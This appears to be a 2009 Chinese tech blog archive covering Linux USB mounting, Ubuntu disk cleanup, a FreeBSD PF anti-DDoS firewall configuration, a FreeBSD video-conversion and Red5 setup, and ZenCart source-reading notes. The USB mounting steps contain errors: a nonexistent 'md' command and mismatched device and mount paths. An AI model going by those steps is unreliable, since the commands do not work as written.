第三步, 载入 u 盘，需键入以下命令：
Linux如何加载(优)U盘
第一步，以root用户登陆
先加载USB模块 modprobe usb-storage
用fdisk -l 看看U盘的设备
假如U盘是sda1
第二步，确定在目录 /mnt 下建立了文件夹 /usb,如果未建立可键入一下命令： md /mnt/usb
成功后进行下一步。
第三步, 载入 u 盘，需键入以下命令：
mount -t vfat /dev/sda /mnt/usb_disk
成功后，即可使用 u 盘了, 文件就在目录 /mnt/usb 下。
第四步，卸载u盘
在使用完u盘后，在拔出前需要先键入卸载U盘命令
命令如下： umount /mnt/usb
二、Linux mount使用指南
在Linux中，如果你要使用储存设备 (Mo、硬盘、光驱等) ，就得先将它挂上 (Mount)，而当储存设备挂上了之后，就可以把它当成一个目录来进行访问。挂上一个设备使用mount命令。

在使用mount这个指令时，至少要先知道下列三种信息：

1. 要Mount对象的文件系统类型？ (File system type)

2. 要Mount对象的设备名称？ (/dev/????)

3. 要将设备Mount到哪个目录去？

一、获得系统支持的文件系统类型

就第一点来说，用户可以执行

cat /proc/filesystems

来获得机器上支持的文件系统类型。如果系统并不支持你要挂接设备的文件系统类型，那你可能需要重新编译内核以使其增加对该种文件类型支持。关于如何编译内核请参照LinuxAid在线培训栏目中的相关文章。

常用的文件系统有：

Win95/98常用的FAT 32文件系统：vfat

Win NT用的文件系统：ntfs

OS2用的文件系统：hpfs

Linux用的文件系统：ext2

光盘片用的文件系统：iso9660

其中虽然vfat是指FAT 32系统，但事实上它也兼容FAT 16的文件系统类型。

二、确定设备的名称

在Linux中，设备名称通常都在/dev里。这些设备名称的命名都是有规则的，我们可以用”推理”的方式把设备名称找出来。

譬如说/dev/hda1这个IDE设备。hd是Hard Disk(硬盘)的意思，sd是SCSI Device，fd是Floppy Device(或是Floppy Disk?)。a则是代表第一个设备，通常IDE接口可以接上四个IDE设备(例如四块硬盘)。所以要识别IDE硬盘的方法分别就

是：hda、hdb、hdc、hdd。此外，hda1中的”1″代表hda的第一个硬盘分区

(partition)，hda2代表hda的第二个分割区，依此类推。

此外，你可以直接检查/var/log/messages这个文件，在该文件中可以找到计算机开机后，系统已辨认出来的设备代号。

三、查找挂接点

最后我们要决定将设备挂接到哪里，先查看一下你的计算机是不是有个/mnt的空目录？该目录就是专门用来当作挂载点(Mount Point)的目录。建议您在/mnt里多建这几个目录：/mnt/ cdrom、/mnt/floppy、/mnt/mo等来当作目录的专用挂载点。

举例而言，如要挂载下列五个设备的话，其执行指令可能是 (假设都是Linux的ext2系统，如果是Win XX的话，请将ext2改成vfat)：

1. 软盘 ===>mount -t ext2 /dev/fd0 /mnt/floppy

2. MO ===>mount -t ext2 /dev/sda /mnt/mo

3. cdrom ===>mount -t ext2 /dev/hdc /mnt/cdrom

4. SCSI cdrom ===>mount -t iso9660 /dev/sdb /mnt/scdrom

5. SCSI cdr ===>mount -t iso9660 /dev/sdc /mnt/scdr

这是假设，如果你的设备的名称跟这个不同的话请自行修改。

最后需要注意的是：

1. 执行mount动作时先打一下pwd看看现在的目录是不是在挂载点，如果现在目录在挂载点的话，mount (或umount)不会成功 (会显示device busy)。

2. 想卸载某设备的语法是umount 目录名，例如umount /mnt/cdrom等。

Ubuntu空间不够用,为Ubuntu减肥,腾点空间出来

admin — Fri, 22 May 2009 03:53:08 +0000

这段时间,使用ubuntu9.04 时,总听到硬盘在晌.在终端下运行 df -k 发觉/分区的空间使用率已经到98%,是要想办法给ubuntu减减肥.腾点空间出来啦..于是,就在网上,找到下面这篇文章,照着用一下,效果蛮好的…于是就将这篇文章记下来..

linux和windows系统不同，linux不会产生无用垃圾文件，但是在升级缓存中，linux不会自动删除这些文件，今天就来说说这些垃圾文件清理方法。

1，非常有用的清理命令：
sudo apt-get autoclean
sudo apt-get clean
sudo apt-get autoremove

这三个命令主要清理升级缓存以及无用包的。

2，清理opera firefox的缓存文件：
ls ~/.opera/cache4
ls ~/.mozilla/firefox/*.default/Cache

3，清理Linux下孤立的包：
图形界面下我们可以用：gtkorphan
sudo apt-get install gtkorphan -y

终端命令下我们可以用：deborphan
sudo apt-get install deborphan -y

4，卸载：tracker
这个东西一般我只要安装ubuntu就会第一删掉tracker 他不仅会产生大量的cache文件而且还会影响开机速度。所以在新得利里面删掉就行。

5，删除多余的内核：一定不要删错哦，切记！！
打开终端敲命令：dpkg –get-selections|grep linux
有image的就是内核文件
删除老的内核文件：
sudo apt-get remove 内核文件名（例如：linux-image-2.6.27-2-generic）
内核删除，释放空间了，应该能释放130－140M空间。
最后不要忘了看看当前内核：uname -a

附录：
包管理的临时文件目录:
包在
/var/cache/apt/archives
没有下载完的在
/var/cache/apt/archives/partial

＝＝＝＝＝＝＝＝＝＝＝进阶＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝＝
1. 用新利得删除残留的配置文件
经常安装和卸载软件用户都知道只用 apt-get remove 是不能把软件彻底清除的,所以养成良好的习惯很重要,我一般都是认为那些以后不会再安装的软件都用 aptitude purge/apt-get remove — purge 来卸载,这样就会把配置文档也一起删除,如果不知道以前卸载的那些配置文档删除有没有怎么办!?
没关系”凡存在过的必留下痕迹”(keso语^_^),我们来一步一步删除那些残留文档:
打开新利得(系统-系统管理-新利得),在左下角选择状态,现在在上面的列表里就会看到如下的分类:
已安装
已安装(本地的或陈旧的)
未安装
未安装的(残存配置)
软件仓库里的新内容
现在选择未安装的(残存配置)如果没有这个选择那就证明你的系统并没有残存配置文件.
现在把右面列表里不想保留的配置文件删除就可以.

2. 删除系统无用的软件包
当你需要安装某个软件包时,APT从/etc/apt/sources.list中所列的主机下载所需的文件,将它们保存到本机软件库(/var/cache/apt/archives/)，然后开始安装.
本地软件库会不断膨胀占用大量硬盘空间,幸运的是,APT提供了工具来管理本地软件库:apt-get的clean方法和autoclean方法.
apt-get clean将删除/var/cache/apt/archives目录和/var/cache/apt/archives/partial目录下锁文件以外的所有文件. 这样以来,当你需要再次安装某个软件包时,APT将重新下载它.
apt-get autoclean仅删除那些不需要再次下载的文件.

3. 卸载那些不被使用的local翻译文档
这次我们要用到一个工具啦:localepurge 看名字就能明白他是干什么的啦.
安装localepurge: sudo apt-get install localepurge
安装好以后,当我们每次使用apt安装软件的时候localepurge就会根据你locale的设置来删除那些不需要的locale文档,比如:当我aapt安装armarok以后就会在安装完成之后看到像:
localepurge: Disk space freed in /usr/share/locale: 70***K (7M左右的文档,具体的数据忘)
当然你也可以通过编辑/etc/locale.nopurge 来编辑需要保留的locale文档..

4. 使用一些工具删除”孤儿软件包”
孤儿软件包是指那些已经没有人维护的软件包当然也就没有软件要依赖它,这儿我们可以用GtkOrphan(要自己下载Deb包安装)或者Wajig(可以apt安装),这两个都是GUI的操作界面,我都没有使用过就不多说了,如果想了解更多的信息可以参考这儿 .

5. 使用debfoster来跟踪安装的软件包
安装:sudo apt-get install debfoster
当我们使用apt安装软件的时候,它会把那个软件所依赖的软件包都安装上去，但是当我们卸载这个软件包的时候，那些为满足这个软件包的依赖关系而装上去的包并没有从系统里卸载掉.这个时候我们就会用到debfoster啦.
debfoster是apt-get和dpkg的前端,当第一次运行debfoster的时候它会问你那些软件包是要保留的,如果不需要就选n就行.
使用debfoster我们可以方便的安装和卸载软件,比如可以使用debfoster package 来安装某个软件,当我们不需要的时候可以用 debfoster package- 来删除它,同时那些没有用的包也会一起删掉.

6. 使用trans-purge 来为Linux桌面瘦身加速

FREEBSD+PF 在6.2上的架设放DDOS 攻击的网站

admin — Wed, 20 May 2009 06:13:36 +0000

现网站和外挂经常带arp和ddos攻击,本来用ros做网吧路由器顶不住ddos，只能换FB6.2+pf,前几天用FB6.2+PF，人多时出watchdog timeout,下面是安装步骤，操作一个写一个，

cd /usr/src/sys/i386/conf
cp GERENIC PFOK
ee FFOK

修改并加入下面东东

ident PFOK
device pf
device pflog
device pfsync
options ALTQ
options ALTQ_CBQ
options ALTQ_RED
options ALTQ_RIO
options ALTQ_HFSC
options ALTQ_PRIQ
options ALTQ_NOPCC
options PANIC_REBOOT_WAIT_TIME=0
options DEVICE_POLLING
options HZ=2000
options IPSTEALTH
# options RANDOM_IP_ID
options TCP_DROP_SYNFIN

config PFOK
cd /usr/src/sys/i386/compile/PFOK
make depend
make
make install
reboot

ee /etc/sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1
net.inet.tcp.drop_synfin=1
net.inet.tcp.sendspace=65536
net.inet.tcp.recvspace=65536
#net.inet.udp.sendspace=65535
net.inet.udp.maxdgram=65535
net.local.stream.sendspace=65535
net.inet.tcp.rfc1323=1
#net.inet.tcp.rfc1644=1
net.inet.tcp.rfc3042=1
net.inet.tcp.rfc3390=1
kern.ipc.maxsockbuf=2097152
kern.maxfiles=65536
kern.maxfilesperproc=32768
kern.polling.enable=1
kern.polling.burst_max=500
kern.ipc.somaxconn=2048
kern.ipc.nmbclusters=32768
net.inet.tcp.delayed_ack=0
net.inet.icmp.icmplim=100
net.inet.icmp.icmplim_output=0
net.inet.tcp.drop_synfin=1

ee /boot/loader.conf
autobootdelay=”2″

ee /etc/rc.conf
sendmail_enable=”NONE”
sendmail_submit_enable=”NO”
sendmail_outbound_enable=”NO”
sendmail_msp_queue_enable=”NO”
clear_tmp_enable=”YES”
update_motd=”NO”
tcp_drop_synfin=”YES”
#icmp_drop_redirect=”YES”
#icmp_log_redirect=”YES”
#log_in_vain=”YES”
#accounting_enable=”YES”
pf_enable=”YES”
pf_rules=”/etc/pf.conf”
pf_flags=”"
#pflog_enable=”YES”
#pflog_logfile=”/var/log/pflog”

这里我就加了句pf_enable=”YES”

uname -a
FreeBSD pf.com 6.2-RC1 FreeBSD 6.2-RC1 #0: Thu Nov 23 04:20:46 CST 2006 sshpf@pf.com:/usr/src/sys/i386/compile/PFOK i386

我的pf.conf

#pfctl -e -F all -f /etc/pf.conf

#只重新load过滤规则
#pfctl -F rules -Rf /etc/pf.conf

#pfctl -f /etc/pf.conf # 重新加载pf.conf 设定档
#pfctl -nf /etc/pf.conf # 确认语法有无符合，但不载入
#pfctl -Nf /etc/pf.conf # 只加载 NAT 的设定档
#pfctl -Rf /etc/pf.conf # 只加载防火墙的过滤设定档

#pfctl -sn # 显示现阶段 NAT 的规则
#pfctl -sr # 显示现阶段过滤的规则
#pfctl -ss # 显示现阶段封包运作状态
#pfctl -si # 显示现阶段过滤封包的统计资料
#pfctl -sa # 显示现阶段所有统计的数据

ext_if=”rl0″
#edu_if=”"
int_if=”fxp0″

ext_addr=”192.168.1.51″

int_net=”172.16.0.0/16″
ext_net = “192.168.0.0/16″
loop = “{lo0, 127.0.0.1}”
OpenPorts = “{21, 22, 80, 88, 4899}”
InsideManagerIPs = “{172.16.0.100}”
InsiteManagerOpenPorts = “{21, 22, 23, 24, 25, 80, 4899}”
priv_nets = “{ 127.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12}” # 定義符合 RFC 1918 私有IP 部份
tcp_services = “{ 22, 88, 4899, 123 }” # 定義 port 22, 113 服務
icmp_types = “echoreq” # 定義 tcmp 回應狀態

## down inactive connection quickly
set optimization aggressive

# Normalization: reassemble fragments and resolve or reduce traffic ambiguities.
scrub in all

nat on $ext_if from $int_net to any -> ($ext_if)
#nat on $ext_if from $int_net to $ext_net -> ($ext_if)

#web server map
#rdr pass on $ext_if proto tcp from any to $ext_if port {www,3389,4899,7745} -> $web_server

#—————————-以下防DOS攻击——————————–
#每个IP最大可以有120个非并发的连接（为局域网用户访问本站考虑）
#每个IP最大连接建立的速率小于每秒8个
#单个IP的最大持续连接数 30
#违反以上规则，把这个ip添加到表中
table persist #维持一个持续的表
block in quick from #阻止表中的ip
pass in on $int_if inet proto tcp from any to $int_if flags S/SA keep state \
(source-track rule,max-src-conn 100, max-src-conn-rate 15/3,max-src-states 30,overload flush, src.track 1)

LSassVirusPort = “{445, 135, 139, 593, 512, 5554, 9996, 9995}”
block quick on $int_if inet proto tcp from any to any port $LSassVirusPort

BitTorrentPort= “{ 512, 2049, 4662, 6880, 6881, 6882, 6883, 6884, 6885, 6886, 6887, 6888, 6889, \
6890, 8880, 8881, 8882, 8883, 8884, 8885, 8886, 8887, 8888, 8889, 8890, 6969, 10700, 21881}”
block quick on $int_if inet proto tcp from any to any port $BitTorrentPort
block quick on $int_if inet proto tcp from any port $BitTorrentPort to any
block quick on $ext_if inet proto tcp from any to any port $BitTorrentPort
block quick on $ext_if inet proto tcp from any port $BitTorrentPort to any

#gameClientPorts = “{4002, 2000, 3838, 4410, 4210, 4230, 5005, 4290, 10010 }”
#GameDenyClients =”{192.168.128.0/24, 192.168.132.0/24}”
#GameServerIps = “{204.251.15.167, 61.152.93.145}”
#block quick on $int_if inet proto tcp from $GameDenyClients to any port $gameClientPorts
#block quick on $ext_if from $GameServerIps to $GameDenyClients
#block quick on $int_if from $GameDenyClients to $GameServerIps

denyserverips = “{202.108.193.21}”
block quick on $int_if from any to $denyserverips

#LSassVirusIp =”{192.168.1.194}”
#block quick on $int_if from $LSassVirusIp to any

freebsd 播客安装教程(附带mencoder　转换)

admin — Wed, 20 May 2009 06:11:34 +0000

操作系统为freebsd6.2,更新你的ports

一、视频转换

1、主要是安装ffmpeg，我们选择ports下的ffmpeg-devel，要在make上加几个参数，不然的话，转制的会没有声音
先安装　ffmpeg　

　cd　/usr/ports/multimedia/ffmpeg
　　ports　安装ffmpeg-devel　在

cd /usr/ports/multimedia/ffmpeg-devel

make WITH_X264=yes WITH_XVID=yes WITH_DTS=yes WITH_LAME=yes
　　这个花费时间比较长
　　make install

　如果要想使用mencoder转换的话，要装mplayer 　不过mencoder　不能截图。还得使用ffmpeg　
　cd　/usr/ports/multimedia/mplayer
　make　config　要是支持rmvb,rm　的话要选那个realplayer

make install

2、安装bash，主要是为convert脚本的使用，那个脚本是用bash写的,也可以不安装把/usr/local/bin/bash　改为/bin/sh
　　cd　/usr/ports/shell/bash
3、convert脚本
给convert加上执行权限，convert内容为
修改SiteRoot　为你supesite的目录
引用:

#!/usr/local/bin/bash
Extension=”mpg 3gp mov mpeg vod mp4 m4v avi wmv”
SiteRoot=”/usr/local/www/data”
for e in $Extension; do
FullFiles=`find $SiteRoot/video/temp -name “*.$e” -exec ls {} \;`
for FullFile in $FullFiles;do
if [ -f $FullFile ];then
a=`basename $FullFile | awk -F “.” ‘{print $1}’`
b=`echo $a | cut -d_ -f 2 | cut -c-6`
if [ !-d $SiteRoot/video/$b ]; then
mkdir $SiteRoot/video/$b
chown -R www:www $SiteRoot/video/$b
fi
#ffmpeg 转换
ffmpeg -i $FullFile -y -ab 56 -ar 11025 -ac 2 -qscale 9 -t 900 -r 15 -s 320*240 $SiteRoot/video/$b/$a.flv
#mencoder 转换
#mencoder “$FullFile” -o “$SiteRoot/video/$b/$a.flv” -of lavf -lavfopts i_certify_that_my_video_stream_does_not_use_
b_frames -oac mp3lame -lameopts abr:br=56 -ovc lavc -lavcopts vcodec=flv:vbitrate=500:mbd=2:mv0:trell:v4mv:cbp:last_pred=3:dia=4:cmp
=6:vb_strategy=1 -vf scale=512:-3 -ofps 12 -srate 22050

chown www:www $SiteRoot/video/$b/$a.flv
ffmpeg -i $SiteRoot/video/$b/$a.flv -y -f image2 -ss 8 -sameq -t 0.001 -s 320*240 $SiteRoot/video/$b/$a.jpg
chown www:www $SiteRoot/video/$b/$a.jpg
rm $FullFile
fi
done
done
4、设定计划任务

　编辑/etc/crontab　文件

　在path中加入/usr/local/bin　

　按i，进入插入状态，然后输入计划命令，其中的n表示每n分钟执行一次转换，可根据自身情况修改n值，
　如：10(每10分钟执行一次转换)
　0-59/n * * * * 　/usr/local/bin/convert　<-修改为你convert路径
二、在线录制
1、安装diablo-jdk1.5　
　　ports安装
　　cd /usr/ports/java/diablo-jdk1.5　
　　这个要手动下载diablo-caffe-freebsd6-i386-1.5.0_07-b01.tar.bz2，根据提示操作就行。
2、安装ant
　　ports　安装
　　cd /usr/ports/devel/apache-ant-1.7.0
3、安装red5
　　下载http://dl.fancycode.com/red5/red5-0.6rc2.tar.gz
　　将red5-0.6rc2.tar.gz 放到/tmp 目录下
　　mv red5-0.6rc2.tar.gz /tmp
　　cd /usr/local
　 tar -zxf /tmp/red5-0.6rc2.tar.gz
mv red5-0.6rc2 red5

请重新编译red5
cd /usr/local/red5
vi build.properties
找到java.target_version=1.6修改为java.target_version=1.5，然后进行重新编译
执行make

将online.zip 解压到 /usr/local/red5/webapps 下
　　online.zip 下载地址：http://www.supesite.com/tools/online.zip
　　cd /usr/local/red5/webapps
　　tar -zxf /tmp/online.tar.gz
　　开启Red5服务
　　/usr/local/red5/red5.sh &

　　好，现在就可以播客。

这段时间分析zencart源代码的思想笔记。

admin — Mon, 11 May 2009 10:35:45 +0000

一\调整图片的上传路径,统一上传到http://192.168.0.10/topearl/

二\调整图片的调用路径,统一调用http://192.168.0.10/topearl/.

三\在调用图片的过程中,调用水印功能.以及md5加密功能.生成有水印以及md5加密的图片,并由前台程序调用显示出来.并将生成的有水印的,并且md5加密过的图片放到各个网站的images目录下面.

大概的思路与流程就这样..要逐步编程为实现.

阅读代码笔记:

1\newimg imgedit等值是提交表单对应的表单值.

2\初步判断,dmz_cache的图片也是这个ih组件来控制来生成.

3\所有图片的操作,都是由这个image handles模块来控制,而那个includes的下面的configure.php都是一个路径变量的设置,以及数据库连接参数的设置.

4\include下面的class 以及Fuction都是一些常用操作功能的设置.包括.图片一部份节能处理操作.

5\图片上传调用的类是includes/class下面的upload.php类文件.

6\阅读数据库,熟悉数据表,特别是数据表名以数据字段,熟悉之,更方便读懂源代码!

7\刚刚发现,俺一直疑惑看源代码里的SQL语句时,总找不到执行操作的表.原来是SQL语句中都加了前缀,例如table_tablename 等.正克确而实际的数据名是tablename.
现在问题就是仍然搞明,他们文件是如何调用与转移的?明白这点,就好写代码?

8\经过测试,现在已经解决图片复制其它目录的问题.而且经过观察,相应的img录,dmz_cache目录也可以看到生成的缓存图片.感觉工作已经完成一大半.只余下最后一步,就是将生成的加水印的图片放到本地网站的images目录下面,方便以后查询调用.并且,要判断,本地有的,就从本地但读取,本地没有的,才从远程的图片目录调用.是事情就这样简单吗?

9\那么俺应该再精读源代码,如果以前是走马观花地阅读,是大概级阅读,那么现在就是代码级阅读.那就先从Fuction,再读class.再读ih2模块.
10\ 阿mark说要改变那些加密过的字符为自已定制的字符,这个比较难实现.因为MD5加密的字符都是随机的.不能让MD5加密的字符完全符合自已的要求.除非取消MD5加密.而将后缀名改为按提交时间或者按产品目录分类来定义吧.
11\ zencart是基于面向对象,也就是OOP来开发的.刚刚发觉这种写法的一样好处,就是代码比较精练,没有冗余代码设置.

12\其实Zencart的源代码也不是太难阅读,只要细心些,时间充裕些.基本上都可以读懂.只要能读懂,就基本知道在哪里改.如何修改.
13\不要对长版面的代码感到烦恼.就当他是一些书本来读就行.不要只着眼于那些短版面的代码.
14\阅读代码,情愿读慢些,都要尽量读懂它.不要因为看不进去,就走马观花看.这样未必浪费时间.
15\zencart的代码还有好处,就是注解详尽而清晰,这样的代码风格更容易方便别人读懂!
16\其实,主要通过几天的接触,对ZENCART的源代码有所熟悉,消除了原来那种陌生感!那么以后阅读与修改,就方便好多.也容易得多.
17\那么现在就要考虑写成一个Fuction,.就是,判断,判断本地有那个图片文件的.就读取本地,没有的,就要调用远程图片服务器?
18\积极开动脑筋,根据需求/要求,去构筑与理清思路,然后根据思路去写伪代码,然后再形成真实的代码.
19\如果之前俺考虑与分析得是后台图片提交的路径的设置.那么现在就要考虑与分析图片获取与调用的代码,看他们的图片调用机制是什么的?
20\图片上传时候可能要加个判断,例如图片重复上传时候,但是这个好像不重要.现在主要要考虑的是图片调用时候.判断图片调用时候什么时候从本地读取,什么时候从图片服务器调用.那么本地的的图片又是从那里来呢.从远程图片服务器来.不是说,先尝试从服务器读取,本地目录没有,才从远程的图片服务器调用.并放到本地images目录…俺相信图片调用时候,程式应该已经相关判断机制.那么在这个判断机制加强一下.应该可以.
21\动手写代码之前,一定要理清思路,思路不清.很难编码的.
22\FUNCTION的作用就是,输入一两个变量,就能得出某个值或者输出.所以.应这样考虑.将图片的名字输入FUCTION就可以判断出这个图片是在本地已有,还是没有,有的,就直接输出值,没有,就到远程服务器拉取相应的图片.
23\尽快将实现思路圈划出来.不怕代码没写好,就怕思路不清晰,逻辑出错…

24\先得出一个文件名,然后将这个文件名扔入FUCTION里,无论怎样,从FUCTION出来都是一个文件,例如图片.
25\手阅代码,是学好编程的最好方式,所以,无论如何,都要手阅代码.这是学好编程一个保障.一个保证.
26\BMZ_images_handle.class.php就是加水印的CLASS类。要细读。刚想到的，就是俺新加的判断本地目录有没有产品图片的FUNCTION也要应加在这里。
27\俺现在就是要搞清楚，产品在是那里调用图片的。要搞清楚。
28\再次伸明，ZENCART的代码还是容易看得懂，只要细心看，认真看，基本上都可以看懂，因为都是那些变量，那些语法，那些FUNCTION。还有手册。所以，不需心存畏惧。最重要，多思考，多编写。多测试。思路清晰，逻辑就不会错。逻辑不会错。那么就令代码更不会错。最好就是全部是语法错。所以说，编程思维很重要。思路越清晰。写代码越快。一切都是编程思维来作证！

29\自定义Function调用及输出值应出实例，刚刚意会到的。或者留意到的。
$color = $this->get_background_rgb($bg);//调用get_background_rgb Function ，然后输入变理$bg ,最后输出$bg 对应的color值。
if (!$color) {
$color = $this->get_background_rgb($ihConf['default']['bg']);
$transparent = (strpos($ihConf['default']['bg'], ‘transparent’) !== false);
} else {
$transparent = (strpos($bg, ‘transparent’) !== false);
}
$transparent &= preg_match(‘/(\.gif)|(\.png)/i’, $file_ext);

get_background_rgb 的Function如下：
function get_background_rgb($bg) {
$bg = trim(ereg_replace(‘transparent’, ”, $bg));
list($red, $green, $blue)= split(‘[, :]‘, $bg);
if (preg_match(‘/[0-9]+/’, $red.$green.$blue)) {
$red = min(intval($red), 255);
$green = min(intval($green), 255);
$blue = min(intval($blue), 255);
$color = array(‘r’=>$red, ‘g’=>$green, ‘b’=>$blue);
return $color;
} else {
return false;
}
}

30\这个dmz_image_handle.class.php类真的很重要，许多图形处理的Function都在这里调用与起作用。要认真分析与阅读。
31\不要一看到一大堆代码就发恐。不要看到一大堆代码就想往后退。静下心来，认真些，认真看，边看边思考，边分析。读多，想多，写多，就什么问题就没有。所以，不用怕。不有恐惧的。
32\经过昨天的阅读代码与分析。基本上找回编码的感觉。现在就是要多清晰自已的思路。写多些代码，读多些源代码，多借鉴与模似别人的代码写法。。
33\俺写php代码，俺是越来越有感觉啦。继续努力。不怕写错，就怕不敢写。要勇于写。想到那就写到那，边写，边纠正逻辑错误。
34\现在从远程图片服务器取代码那块代码基本上写完，现在就要编写本地判断有没有图片那块，并且这块判断本地有没有图片这块务必在加水印之前起作用！
35、上面说得没错。如果要实现阿MARK的需求，判断本地有没有目录，以及没有就从图片目录器那里取值一样。这些代码务必在加水印之前完成。
36\现在核心代码基本上写完，也就要看一下如何调用。在哪调用。还有，今天下午六点半之前，完成基本编码与置，整合，方便明天作整合测试。
37\刚才搜索一下，发现调用到$DIR_WS_IMAGES 这个变量，在多处调用。要满足需求，要多处修改，而且不能改错。要一个一个来校正来修改。\

38\如果按照昨天阿MARK所说，直接指定图片服务器，就可以，也就比较简单，但是这样要考虑那些缓存图，大中小图的存放问题。
39\本地的images只是充当本地存放图片作用。也就是存放操作者在后台增加的图片的用途，现在，本地IMAGESE取消，也可以说迁移到图片服务器度，那这个IMAGES真的可以取消。不作考虑。因为前台图片显示调用的是BMZ_CMACHE的图片，而对于images下面的large 以及medium目录放在images都可以。
40\昨天查询这个图片调用路径时，发现，如果要新加一个图片链接变量时，要修改的地方很多，并且要小心修改。。。尽快理清这个思路，想清这个问题，这个思路不清。就会一直成为死结。影晌开发进度！
41\问题是做着解决的。而不是想着去解决的。一时想不通，那就按基本思路去做。在做着的时候，边思考边解决。总比一直停在这个问题要好！
42、那个本地IMAGES真的没必要保留。既然决定将图片目录外迁至图片服务器，那就不需考虑本地图片服务器变量。那就按这个思路去做。去处理！
43\初步分析一下，在后台增加新图片时，报错的原因是不能读取远程图片服务器的图片，那么如何才能自由自主地读取远程的图片服务器？难道要将它移到本地图片服务器？
44\刚刚想到，可不可以将上传图像保存到本地某个图像目录，然后，将本地图像目录跟远程的图像目录建立一个镜像。或者，将图片统一上传到远程图像目录，然后在本地建立一个镜像目录？
45、刚刚看到，如果要想列出远程服务器某个目录下的文件，这个好像不可能，除非远程服务器支持目录显示。但这会存在很大的安全风险。。。上月
46\经过跟阿MARK的讨论，那个直接设图片服务器为远程目录不成功。这个思路走不能。跟着想其它方法。
47、阿MARK说数据库已有图片的名称。可以直接调用数据库的图片服务器名称来判断。判断本地有的。就直接调用。判断没有。就从图片服务器目录那里调用。
48.阿MARK的意思就是说改造后台那个UPLOAD功能。在上传时，判断本地有没有那个产品图片，有的话，就直接跑下一步。按平时的流程去跑。如果没有。就调用图片服务器。将相应的图片服务器下的目录调用过来。。。
48、原来俺的思路是对的。只不过后来。俺想偏啦。走不出来啦。。
49\再强调一句。思路要清晰。。需求要清晰。需求与思路都不清晰。很难编出好的程序来。要记住！
50、为增加对这个ZENCART程序的认识。阅读代码不能只限于那几个常接触的代码。尽可能全部阅读！
51\现在存在什么问题？那就是通过调用数据库的图像名来判断本地有没有相应的图像，如果有，就行，没有就调用图片远程图片服务器的图片。
52、那FUCTION基本写完，但现在就不知在哪里调用它，并且以什么条件来激活它。
53\这个SQL语句怎样设计呢？那就看看需求，需求是要从数据库取出相应的图片名字。。。那么那where 判定语句是怎样写呢？
54\阅读源代码的作用就是在读懂别人写的代码的同时，就是要借签与参考别人的编码写法。必要时，要摘抄与引用别人的代码。这就是阅读源代码的作用之一，至于读过源代码来常握编码者的编程思路，这个要慢慢浸淫，一步一步积累。阅读源代码与阅读别人的文章一样，在理解的基础上，借签别人的写法与文字。甚至摘抄。这个在文人眼中不算是抄袭。所以，要明白，阅读源代码的作用与要根本目的，不要，读了大半天的源代码，还不知要干什么，那就难以交待啦。还有。手册，要常备左右，要常翻。手册的作用是理清与纠正俺知识上的盲点与不足。当然，最重要是要多编码，多测试。多看效果，多从排错中，获取经验与知识！
55\刚跟以前的同事交流沟通过。那些简写字符是数据表的别名，也就是表名的简写。后面是数据表的字段名。这些别名的设定是在数据表里设定的。
56\发觉俺对这个ZENCART不是不太熟。还有许多源代码没看到。还有许多设置变量都不清楚。这次跟同事沟通过。才发现到俺的不足。所以，决定，这个下午可能要将前后台的INCLUDE下面的源代码阅读一篇。。还有那些CLASS与FUCNTION，都要看一篇。尽量看懂。不懂，就问LEON。。
57\这个ZENCART/WHOLESALEC程序真是博大精学。非一般开源程序。并不是简简单单就能看懂，要花很多心力。。。。该程序层层调用。环环相扣。。短时间内真的不那么看懂！
58、虽然还有许多源代码没有阅读。但是经过之前的努力，现在阅读源代码已经有很大进步，之前，阅读有点缓慢，现在阅读速度快些。这是好事。这个可以激励自已更好地掌握与精通这个ZENCART源程序！
59\既然数据库已有图片名字，那么将图片名字从数据库中调用出来，然后判断本地有没有这个图片，没有就从远程图片服务器调用，思路就是这样。。
60、为什么俺一直执着于通过这个upload来触发这个FUCNTION呢？自已可以考虑不用这个FUCTION，可以这样考虑：1、不用这个UNLOAD命令，直将将这个FUCNTION放置于前台图片调用那差代码中，另外一个思路就是将这个UPLOAD改造，改造成为触发器，也就是说不用直接指定远程服务器变量，改回原来，然后，新增一个变量，好，就这样办！

61\俺享受这种自麻醉，麻木自已，不用让自已那么烦。不用想太多东西！
62、相信自已，相信定能成为编程高手。专心致志，心无旁望。目标一致，就是成为编程高手！
63\$this 只能在class里使用与定义。那么fucntion呢。如何调用呢。从ZENTCART的代码来看！
64\要分清zen_not_null($images)与$zen_not_null[$images]的区别，前者为Fuchtion的值，后者为数组的值，不可以搞混！
65\为什么之前定义的变量在function不起作用呢？全部要直接指定变量。为什么呢？难道。俺还有许多关于class类,Function的理解还不够？？
66\变量只能在Fuction内设置，不能在Fuction外设置？还是这样，如果定义变量，在Fucntion外定义的。要将它定义为全局变量，而不是设置局部变量。如果设成局部变量，那只能在某段过程代码里执行。而且只能执行一次。相反全局变量，就可以在全局调用，并且，多次调用？
67、经过测试。基本上可以断定俺的推测是对的。如果是局部变量，就不能在FUNCTION调用。要再定义。或者将一些常用变量设成一个全局变量，然后调用这个全局变量。就好像现在ZENCART或许多开源程序一样。会将一些常用的变量，统一写到一个存有全局变量的PHP文件。然后在FUCNTION调用这个全局变量！
68、这个1值从何而来？？这个1值应该是代表真true的那个1值，如果为0，就是假false的值。
69\俺需要的遍历这个图像目录下面所有图片名，然后判断出这个目录有没有俺要的图片。有就好，没有就连接远程图片服力器来获取！
70、借签与参考微软那个桌面搜索的代码。看它是如何找到match出要查找的文件名的！
71\刚想到的。阅读源代码，分析开源软件的代码的好处，就是，如果要查看某个fuction的具体应用，那就可以用DW打开这个开源软件，并且DW查找相关的Fucntion应用，看看实际应用，必要时，拿来用！
72\以后要吸取教训，在php编写sql语句时，为避免出错，先将sql语句放到phpmyadmin 先实地跑一跑，看有没有语法错误先。再写入php代码。。。这也是一种习惯。
73\为什么function单独执行就可以，放入fuction组就不行。那是。因为$image值没有指定，也可以说是远程服务器没有要下载的图片文件名。所以报错。。
74、或者，俺不需要想得这么复杂。以免将自已搞晕啦。只要能解决问题，解决掉俺的需求就可以。还有。在编码时候，要谨记随时自已思路清晰。以免语入死胡同，走不出来！
75、两个知识盲点，就是if 等判断语句的详累与精确用法。其次，就是就是变量的赋值方法，也就是如何将$a 的值赋给$b??尽快解决这两个知识盲点！
76、开源软件就是有个好处，那就是，俺在编码时，不能确定某个Fucntion的用法，或者不能晚明确某个语法的用法，就可以查找这些开源代码。观察这些编写开源软件的大师的是如何使用这些Fuction以及这些php 语法知识的。并且最终为俺所用。！
